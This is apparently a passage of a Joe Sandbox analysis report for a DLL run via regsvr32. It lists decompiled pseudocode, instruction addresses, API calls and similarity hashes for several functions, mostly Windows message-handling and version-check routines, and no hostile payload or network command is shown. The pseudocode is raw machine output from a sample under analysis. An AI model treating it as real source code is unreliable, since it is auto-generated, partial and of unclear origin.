							if(_t313 != 0) {
								 *((intOrPtr*)( *_t313 + 8))(_t313);
							}
							_t267 =  *(_t432 - 0x3c);
							 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
							__eflags = _t267;
							L63:
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t267 + 8))(_t267);
							}
							_t254 =  *(_t432 - 0x38);
						}
					}
				} else {
					_t253 =  *(_t432 - 0x3c);
					 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
					_t439 = _t253;
					L82:
					if(_t439 != 0) {
						 *((intOrPtr*)( *_t253 + 8))(_t253);
					}
					_t254 = _t418;
				}
				L85:
				 *[fs:0x0] =  *((intOrPtr*)(_t432 - 0xc));
				return E100117AE(_t254,  *((intOrPtr*)(_t432 - 0x14)));
			}

0x1000db84
0x1000db89
0x1000db8c
0x1000db91
0x1000dba0
0x1000dba1
0x1000dba2
0x1000dba3
0x1000dba5
0x1000dba8
0x1000dbab
0x1000dbae
0x1000dbaf
0x1000dbb3
0x1000dbb8
0x1000dbc8
0x1000dbcc
0x1000dbde
0x1000dbe1
0x1000dbe3
0x1000dbe6
0x1000dc65
0x00000000
0x1000dbe8
0x1000dbe8
0x1000dbeb
0x1000dbfa
0x1000dbfe
0x1000dc00
0x1000dc03
0x1000dc05
0x1000dc08
0x1000dc32
0x1000dc35
0x1000dc37
0x1000dc39
0x1000dc3c
0x1000dc40
0x1000dc55
0x1000dc57
0x1000dc5b
0x1000dc60
0x1000dc60
0x1000dc69
0x1000dc70
0x1000dc73
0x1000dc7d
0x1000dc93
0x1000dc97
0x1000dc9b
0x1000dcae
0x1000dcb8
0x1000dcce
0x1000dcd0
0x1000dcd3
0x1000dcd6
0x1000dce8
0x1000dceb
0x1000dcee
0x1000dcee
0x1000dcf1
0x00000000
0x00000000
0x1000dcfa
0x1000dd04
0x1000dd07
0x1000dd0c
0x1000dd0f
0x1000deaa
0x1000deaa
0x1000deae
0x1000deb2
0x1000df65
0x1000df6a
0x1000df6c
0x1000df6c
0x1000df6c
0x1000df6c
0x1000df72
0x1000df74
0x1000df7a
0x1000df83
0x1000df83
0x1000df89
0x1000df89
0x1000df8b
0x1000df93
0x1000df98
0x00000000
0x1000deb8
0x1000deb8
0x1000debe
0x1000dec8
0x1000dede
0x1000dee2
0x1000dee6
0x00000000
0x1000dee8
0x1000dee8
0x1000deeb
0x1000deed
0x1000def2
0x1000def2
0x1000def5
0x1000def5
0x1000def7
0x1000defc
0x1000deff
0x1000deff
0x1000df00
0x1000def5
0x00000000
0x1000deed
0x1000dee6
0x1000dd15
0x1000dd15
0x1000dd1a
0x00000000
0x1000dd20
0x1000dd20
0x1000dd23
0x1000dd26
0x1000dd77
0x1000dd7a
0x1000de07
0x1000de0b
0x1000de1a
0x1000de1e
0x1000de25
0x1000de2c
0x1000de2f
0x1000de32
0x1000de37
0x1000de3a
0x1000de43
0x1000de46
0x1000de48
0x00000000
0x1000de48
0x1000de3c
0x1000de3c
0x1000de4d
0x1000de50
0x1000de51
0x1000de52
0x1000de53
0x1000de53
0x1000de54
0x1000de54
0x1000de58
0x1000de5e
0x1000de68
0x1000de7e
0x1000de82
0x1000de86
0x1000df23
0x1000df26
0x1000df2c
0x1000df2d
0x1000df2e
0x1000df2f
0x1000df39
0x1000df3c
0x1000df46
0x1000df53
0x1000df5b
0x1000df60
0x1000df9a
0x1000df9d
0x1000dfa4
0x1000dfa6
0x1000dfb0
0x1000dfb6
0x1000dfb9
0x1000dfba
0x1000dfc0
0x1000dfc1
0x1000dfc3
0x1000dfc6
0x1000dfca
0x1000dfcd
0x1000dfd3
0x1000dfd4
0x1000dfd7
0x1000dfdd
0x1000dfde
0x1000dfe1
0x1000dfe4
0x1000dfe9
0x00000000
0x1000de88
0x1000de88
0x1000de8b
0x1000de8d
0x1000de92
0x1000de92
0x1000de95
0x1000de95
0x1000de97
0x1000de9c
0x1000de9f
0x1000de9f
0x1000dea0
0x1000dea3
0x1000df03
0x1000df03
0x1000df06
0x1000df0b
0x1000df0e
0x1000df13
0x00000000
0x1000df18
0x1000dd80
0x1000dd80
0x1000dd8a
0x1000dd95
0x1000dd9e
0x1000dda6
0x1000ddae
0x1000ddb5
0x1000ddc7
0x1000ddca
0x1000ddd0
0x1000ddfa
0x1000ddff
0x00000000
0x1000ddff
0x1000dd28
0x1000dd31
0x1000dd36
0x1000dd39
0x1000dd3f
0x1000dd49
0x1000dd6a
0x1000dd6f
0x1000dfec
0x1000dfec
0x1000dff3
0x1000dff6
0x1000dffa
0x00000000
0x1000dffa
0x1000dd26
0x1000dd1a
0x00000000
0x1000dd0f
0x1000e002
0x1000e005
0x1000e06a
0x1000e06d
0x1000e071
0x1000e07b
0x1000e091
0x1000e094
0x1000e096
0x1000e098
0x1000e09b
0x1000e0ed
0x1000e105
0x1000e10a
0x1000e10c
0x1000e10e
0x1000e111
0x1000e117
0x1000e117
0x1000e11a
0x1000e11d
0x00000000
0x1000e09d
0x1000e09d
0x1000e0a0
0x1000e0a5
0x1000e0a5
0x1000e0a8
0x1000e0a8
0x1000e0aa
0x1000e0af
0x1000e0b0
0x1000e0b3
0x1000e0b6
0x1000e0b9
0x1000e0b9
0x1000e0b9
0x1000e0bb
0x1000e0be
0x1000e0c3
0x1000e0c6
0x1000e0cc
0x00000000
0x1000e0cc
0x1000e007
0x1000e007
0x1000e00b
0x1000e010
0x1000e012
0x1000e015
0x1000e066
0x00000000
0x1000e017
0x1000e017
0x1000e019
0x1000e01c
0x1000e021
0x1000e021
0x1000e024
0x1000e024
0x1000e026
0x1000e02b
0x1000e02c
0x1000e02f
0x1000e032
0x1000e024
0x1000e035
0x1000e038
0x1000e03d
0x1000e040
0x1000e045
0x1000e048
0x1000e04c
0x1000e052
0x00000000
0x1000e052
0x1000e015
0x1000dcd8
0x1000dcd8
0x1000dcdb
0x1000e0cf
0x1000e0cf
0x1000e0d2
0x1000e0d7
0x00000000
0x1000e0d7
0x1000dc9d
0x1000dc9d
0x1000dc9d
0x1000dca0
0x1000dca4
0x1000e0d9
0x1000e0d9
0x1000e0de
0x1000e0de
0x1000e0e1
0x1000e0e1
0x1000dc42
0x1000dc42
0x1000dc44
0x1000dc4d
0x1000dc4d
0x1000e123
0x1000e123
0x1000e126
0x1000e12a
0x00000000
0x1000e12a
0x1000dc0a
0x1000dc0a
0x1000dc0c
0x1000dc10
0x1000dc15
0x1000dc15
0x1000dc18
0x1000dc1b
0x1000dc1f
0x1000e054
0x1000e054
0x1000e059
0x1000e059
0x1000e05c
0x1000e05c
0x1000dc08
0x1000dbce
0x1000dbce
0x1000dbd1
0x1000dbd5
0x1000e12c
0x1000e12c
0x1000e131
0x1000e131
0x1000e134
0x1000e134
0x1000e136
0x1000e139
0x1000e14c

APIs

__EH_prolog.LIBCMT ref: 1000DB84

Strings

4, xrefs: 1000DFEC

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog
String ID: 4
API String ID: 3519838083-4088798008
Opcode ID: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
Instruction ID: 1dfa92099b7bbb73699ef0bf43d1d48827835450d39971bd9aeca5f6306c0f37
Opcode Fuzzy Hash: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
Instruction Fuzzy Hash: 8412D071D04245EFEB09DFA4D884AAEBBB1EF44350F25819AF805AF296C771ED40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1003437E Relevance: 3.0, APIs: 2, Instructions: 40
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003437E(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t12;
				signed char _t15;
				void* _t20;

				_t20 = __ecx;
				_t15 = E100202AB(__ecx);
				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000001) == 0)) {
					L6:
					return E10031CF0(_t20, _a4, _a8);
				}
				_t12 = E10023123(_t15, _t20, _a4, _a8);
				if(_t12 == 0) {
					goto L6;
				}
				return _t12;
			}

0x10034384
0x1003438b
0x1003438f
0x100343ce
0x00000000
0x100343d6
0x100343c5
0x100343cc
0x00000000
0x00000000
0x100343df

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

GetKeyState.USER32 ref: 100343A8
GetKeyState.USER32 ref: 100343B1

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongWindow
String ID:
API String ID: 3716621309-0
Opcode ID: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
Instruction ID: 5de781b028f8a4fce12e3c0fa49c43aff6f22c7add5c7a501000866edff81116
Opcode Fuzzy Hash: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
Instruction Fuzzy Hash: FFF02B3A20021F6EDB13AA55CC81FA93A55DF406E1F024135FD04AF252DE71EE129290

Uniqueness

Uniqueness Score: -1.00%

Function 10001100 Relevance: 3.0, APIs: 2, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10001100() {
				struct _OSVERSIONINFOA _v148;
				long _t6;

				_v148.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v148);
				if(_v148.dwPlatformId != 2) {
					L2:
					_t6 = E10001090;
				} else {
					_t6 = E100010F0;
					if(_v148.dwMajorVersion < 5) {
						goto L2;
					}
				}
				InterlockedExchange(0x1004b0a0, _t6);
				return  *0x1004b0a0();
			}

0x1000110a
0x10001112
0x1000111d
0x1000112b
0x1000112b
0x1000111f
0x10001124
0x10001129
0x00000000
0x00000000
0x10001129
0x10001136
0x10001148

APIs

GetVersionExA.KERNEL32 ref: 10001112
InterlockedExchange.KERNEL32(1004B0A0,10001090), ref: 10001136

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExchangeInterlockedVersion
String ID:
API String ID: 2700998522-0
Opcode ID: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
Instruction ID: cbef01c832245ed46ef0d161ca004d6dcd336c7d999a9848a1027e40418eb20f
Opcode Fuzzy Hash: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
Instruction Fuzzy Hash: E8E08C304043889FF320EB24CD48B9E76F5FB08282FC04828F2A5C200AD734494ACB47

Uniqueness

Uniqueness Score: -1.00%

Function 10023973 Relevance: 1.9, APIs: 1, Instructions: 440
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E10023973(intOrPtr* __ecx) {
				signed int _t141;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				unsigned int _t150;
				signed int _t152;
				signed int _t156;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				unsigned int _t163;
				signed int _t167;
				signed int _t171;
				unsigned int _t174;
				signed int _t175;
				signed int _t179;
				signed int _t180;
				signed int* _t184;
				signed int _t186;
				signed int _t194;
				unsigned int _t204;
				void* _t206;

				_t187 = __ecx;
				E10011BF0(0x1003a61c, _t206);
				 *(_t206 - 0x10) =  *(_t206 - 0x10) & 0x00000000;
				_t179 =  *(_t206 + 8);
				_t201 = __ecx;
				if(_t179 != 0x111) {
					if(_t179 != 0x4e) {
						_t204 =  *(_t206 + 0x10);
						if(_t179 == 6) {
							E100233A0(_t187, _t201,  *((intOrPtr*)(_t206 + 0xc)), E100220EE(_t206, _t204));
						}
						if(_t179 != 0x20) {
							L10:
							_t141 =  *(_t201 + 0x48);
							if(_t141 == 0) {
								L19:
								_t180 =  *((intOrPtr*)( *_t201 + 0x28))();
								 *(_t206 - 0x14) = _t180;
								E10037A1B(7);
								_t184 = 0x1004d5f8 + (((_t180 ^  *(_t206 + 8)) & 0x000001ff) + ((_t180 ^  *(_t206 + 8)) & 0x000001ff) * 2) * 4;
								_t146 =  *(_t206 - 0x14);
								if( *(_t206 + 8) !=  *_t184) {
									L24:
									 *_t184 =  *(_t206 + 8);
									_t184[2] = _t146;
									while(1) {
										if(_t146 == 0) {
											break;
										}
										_t147 =  *(_t206 - 0x14);
										_push(0);
										_push(0);
										if( *(_t206 + 8) >= 0xc000) {
											_t148 =  *(_t147 + 4);
											while(1) {
												_push(0xc000);
												_push(_t148);
												_t149 = E10020CD3();
												 *(_t206 + 0x10) = _t149;
												if(_t149 == 0) {
													break;
												}
												_t150 =  *(_t206 + 0x10);
												_t152 =  *(_t206 + 0x10);
												if( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x10)))) ==  *(_t206 + 8)) {
													_t184[1] = _t152;
													E10037A7E(7);
													L105:
													_t156 =  *((intOrPtr*)( *((intOrPtr*)( *(_t206 + 0x10) + 0x14))))( *((intOrPtr*)(_t206 + 0xc)), _t204);
													L106:
													 *(_t206 - 0x10) = _t156;
													goto L107;
												}
												_push(0);
												_push(0);
												_t148 = _t152 + 0x18;
											}
											L34:
											_t146 =  *( *(_t206 - 0x14));
											 *(_t206 - 0x14) = _t146;
											continue;
										}
										_push( *(_t206 + 8));
										_push( *(_t147 + 4));
										_t161 = E10020CD3();
										 *(_t206 + 0x10) = _t161;
										if(_t161 == 0) {
											goto L34;
										}
										_t184[1] = _t161;
										E10037A7E(7);
										L28:
										_t163 =  *(_t206 + 0x10);
										_t184 =  *(_t163 + 0x14);
										_t147 =  *(_t163 + 0x10);
										_t194 =  *(_t163 + 0x10) - 1;
										if(_t194 > 0x40) {
											goto L107;
										}
										switch( *((intOrPtr*)(_t194 * 4 +  &M10023E7A))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E10029068());
												goto L55;
											case 1:
												_push( *(__ebp + 0xc));
												goto L55;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L59;
											case 3:
												_push(__esi);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L84;
											case 4:
												_push(__esi);
												L55:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 5:
												__ecx = __ebp - 0x24;
												E10028C26(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E10021613(__ebp - 0x74, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x58) = __eax;
												__eax = E10022115();
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x48);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E1001E69B(__eax + 0x20,  *(__ebp - 0x58));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x74;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x10) = __ebp - 0x24;
												 *(__ebp - 4) = 0;
												__eax = E10022977(__ebp - 0x74);
												goto L51;
											case 6:
												__ecx = __ebp - 0x24;
												E10028C26(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												_t89 = __ebp - 0x20;
												 *_t89 =  *(__ebp - 0x20) & 0x00000000;
												__eflags =  *_t89;
												 *(__ebp - 0x10) = __ebp - 0x24;
												L51:
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												__eax = E100290DE(__ebp - 0x24);
												goto L107;
											case 7:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E100220EE(__ebp, __esi);
												goto L58;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L84;
											case 9:
												_push(__esi);
												_push( *(__ebp + 0xc));
												goto L85;
											case 0xa:
												_push(__esi);
												_push(E10026280());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L58:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L59:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xb:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L91;
											case 0xd:
												_push(__esi);
												goto L88;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L63;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L63;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E100220EE(__ebp, __esi));
												L88:
												_push( *(__ebp + 0xc));
												goto L89;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x13:
												_push(E100220EE(__ebp,  *(__ebp + 0xc)));
												_push(E100220EE(__ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x1c)) - __esi;
												_t107 =  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												__eflags = _t107;
												__eax = 0 | _t107;
												goto L67;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E10029068();
												goto L69;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E10026280();
												goto L69;
											case 0x16:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E10026280();
												goto L67;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L74;
											case 0x18:
												_push(__esi);
												L74:
												__eax = E100220EE(__ebp);
												L69:
												_push(__eax);
												goto L91;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L77;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L77:
												_push(__eax);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L67;
											case 0x1b:
												_push(__esi);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												L63:
												_push(__eax);
												goto L89;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E100220EE(__ebp, __esi);
												goto L93;
											case 0x1d:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x27;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __cx;
												 *(__ebp + 0xc) = __cx;
												if(__eax != 0x27) {
													_push( *(__ebp + 0xc));
													_push( *((intOrPtr*)(__ebp + 8)));
													L89:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L107;
												}
												_push(E100220EE(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L98;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L84:
												_push(__eax);
												L85:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L93:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L67:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x23:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L100:
												__eflags = _t175;
												if(_t175 != 0) {
													goto L107;
												}
												goto L37;
											case 0x24:
												goto L107;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L107;
												}
												L37:
												_t159 = 0;
												__eflags = 0;
												goto L38;
										}
									}
									_t54 =  &(_t184[1]);
									 *_t54 = _t184[1] & _t146;
									E10037A7E(7);
									goto L37;
								}
								if(_t146 != _t184[2]) {
									goto L24;
								}
								_t186 = _t184[1];
								 *(_t206 + 0x10) = _t186;
								E10037A7E(7);
								if(_t186 == 0) {
									goto L37;
								}
								if( *(_t206 + 8) < 0xc000) {
									goto L28;
								}
								goto L105;
							}
							if( *(_t141 + 0x70) <= 0) {
								goto L19;
							}
							if(_t179 < 0x200) {
								L14:
								if(_t179 < 0x100) {
									L16:
									if(_t179 < 0x281) {
										goto L19;
									}
									if(_t179 > 0x291) {
										goto L19;
									}
									L18:
									_t167 =  *((intOrPtr*)( *( *(_t201 + 0x48)) + 0x94))(_t179,  *((intOrPtr*)(_t206 + 0xc)), _t204, _t206 - 0x10);
									if(_t167 != 0) {
										goto L107;
									}
									goto L19;
								}
								if(_t179 <= 0x10f) {
									goto L18;
								}
								goto L16;
							}
							if(_t179 <= 0x209) {
								goto L18;
							}
							goto L14;
						} else {
							_t171 = E10023401(_t201, _t204, _t204 >> 0x10);
							if(_t171 != 0) {
								L98:
								 *(_t206 - 0x10) = 1;
								L107:
								_t157 =  *(_t206 + 0x14);
								if(_t157 != 0) {
									 *_t157 =  *(_t206 - 0x10);
								}
								_t159 = 1;
								L38:
								 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
								return _t159;
							}
							goto L10;
						}
					}
					_t174 =  *(_t206 + 0x10);
					if( *_t174 == 0) {
						goto L37;
					}
					_push(_t206 - 0x10);
					_push(_t174);
					_push( *((intOrPtr*)(_t206 + 0xc)));
					_t175 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L100;
				}
				_push( *(_t206 + 0x10));
				_push( *((intOrPtr*)(_t206 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L37;
				}
				goto L98;
			}

0x10023973
0x10023978
0x10023980
0x10023985
0x10023990
0x10023992
0x100239b2
0x100239da
0x100239dd
0x100239ea
0x100239ea
0x100239f2
0x10023a0c
0x10023a0c
0x10023a11
0x10023a65
0x10023a6c
0x10023a6e
0x10023a7c
0x10023a87
0x10023a90
0x10023a93
0x10023abd
0x10023ac0
0x10023ac2
0x10023b4c
0x10023b4e
0x00000000
0x00000000
0x10023ad1
0x10023ad4
0x10023ad6
0x10023ad8
0x10023b12
0x10023b32
0x10023b32
0x10023b37
0x10023b38
0x10023b3f
0x10023b42
0x00000000
0x00000000
0x10023b17
0x10023b22
0x10023b25
0x10023e4d
0x10023e50
0x10023e55
0x10023e61
0x10023e63
0x10023e63
0x00000000
0x10023e63
0x10023b2b
0x10023b2d
0x10023b2f
0x10023b2f
0x10023b44
0x10023b47
0x10023b49
0x00000000
0x10023b49
0x10023ada
0x10023add
0x10023ae0
0x10023ae7
0x10023aea
0x00000000
0x00000000
0x10023aee
0x10023af1
0x10023af6
0x10023af6
0x10023af9
0x10023afc
0x10023aff
0x10023b05
0x00000000
0x00000000
0x10023b0b
0x00000000
0x10023b71
0x10023b79
0x00000000
0x00000000
0x10023b7f
0x00000000
0x00000000
0x10023b98
0x10023b99
0x10023b9c
0x10023ba0
0x00000000
0x00000000
0x10023baa
0x10023bae
0x00000000
0x00000000
0x10023c7e
0x10023c7f
0x10023c7f
0x10023c81
0x00000000
0x00000000
0x10023bb8
0x10023bc0
0x10023bc3
0x10023bc7
0x10023bca
0x10023bcd
0x10023bd2
0x10023bd4
0x10023bd7
0x10023bd8
0x10023bdc
0x10023bdf
0x10023be4
0x10023be6
0x10023be8
0x10023beb
0x10023bed
0x10023bf2
0x10023bf5
0x10023bfa
0x10023bfc
0x10023bfe
0x10023bfe
0x10023bfc
0x10023c01
0x10023c01
0x10023c04
0x10023c05
0x10023c06
0x10023c09
0x10023c0a
0x10023c0c
0x10023c0e
0x10023c12
0x10023c16
0x10023c19
0x10023c1c
0x10023c20
0x00000000
0x00000000
0x10023c27
0x10023c2f
0x10023c32
0x10023c35
0x10023c38
0x10023c3b
0x10023c3c
0x10023c3e
0x10023c45
0x10023c47
0x10023c47
0x10023c47
0x10023c4b
0x10023c4e
0x10023c4e
0x10023c52
0x10023c55
0x00000000
0x00000000
0x10023c62
0x10023c65
0x10023c67
0x00000000
0x00000000
0x10023c71
0x10023c74
0x10023c75
0x00000000
0x00000000
0x10023c88
0x10023c89
0x00000000
0x00000000
0x10023c91
0x10023c97
0x10023c98
0x10023c9b
0x10023c9b
0x10023c9e
0x10023c9e
0x10023c9f
0x10023ca3
0x10023ca3
0x10023ca4
0x10023ca6
0x00000000
0x00000000
0x10023cad
0x10023caf
0x00000000
0x00000000
0x10023cb6
0x00000000
0x00000000
0x10023dca
0x00000000
0x00000000
0x10023cbe
0x10023cc1
0x10023cc1
0x10023cc4
0x10023cc5
0x00000000
0x00000000
0x10023cd1
0x10023cd4
0x10023cd7
0x10023cd8
0x00000000
0x00000000
0x10023ce2
0x10023ce3
0x00000000
0x00000000
0x10023b8d
0x10023dcb
0x10023dcb
0x00000000
0x00000000
0x10023dc1
0x10023dc3
0x00000000
0x00000000
0x10023cf3
0x10023cfa
0x10023cfb
0x10023cfd
0x10023d00
0x10023d00
0x10023d00
0x00000000
0x00000000
0x10023d09
0x10023d0c
0x00000000
0x00000000
0x10023d17
0x10023d1a
0x00000000
0x00000000
0x10023d26
0x10023d27
0x10023d2a
0x10023d2b
0x10023d2e
0x00000000
0x00000000
0x10023d35
0x00000000
0x00000000
0x10023d3a
0x10023d3b
0x10023d3b
0x10023d11
0x10023d11
0x00000000
0x00000000
0x10023d47
0x10023d48
0x00000000
0x00000000
0x10023d4d
0x10023d50
0x10023d53
0x10023d56
0x10023d57
0x10023d57
0x10023d5b
0x00000000
0x00000000
0x10023d62
0x10023d66
0x10023cc9
0x10023cc9
0x00000000
0x00000000
0x10023d73
0x10023d76
0x10023d78
0x00000000
0x00000000
0x10023d85
0x10023d88
0x10023d8b
0x10023d8e
0x10023d91
0x10023d94
0x10023da5
0x10023da8
0x10023dce
0x10023dce
0x10023dd0
0x00000000
0x10023dd0
0x10023d9c
0x10023d9d
0x10023da0
0x00000000
0x00000000
0x10023dd7
0x10023dd8
0x10023dd8
0x10023dda
0x00000000
0x00000000
0x10023e06
0x10023e07
